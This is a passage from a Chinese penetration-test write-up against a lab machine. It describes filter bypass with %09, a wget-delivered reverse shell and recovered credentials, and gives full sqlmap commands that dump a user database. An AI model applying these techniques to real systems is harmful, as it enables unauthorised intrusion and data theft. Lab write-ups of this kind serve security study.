摘要 本次渗透测试针对目标靶机192.168.69.158展开，通过信息收集（arp-scan、nmap、dirb）发现开放80/22端口及Web目录。利用registration.php注册漏洞，结合BurpSuite爆破UID激活码（000511），获取管理员凭证（Gemini/secretpassword）。绕过命令执行限制（%09替代空格），通过wget传输反弹Shell脚本并建立交互。

使用sqlmap -r data.txt -D aiweb1 -T systemUser -C "id,password,userName" --dump –batch查看sys表中的信息。然后在用sqlmap -r data.txt --current-db会看到他存在的数据库’aiweb1’分别用sqlmap -r data.txt -D aiweb1 -T user –columns。使用s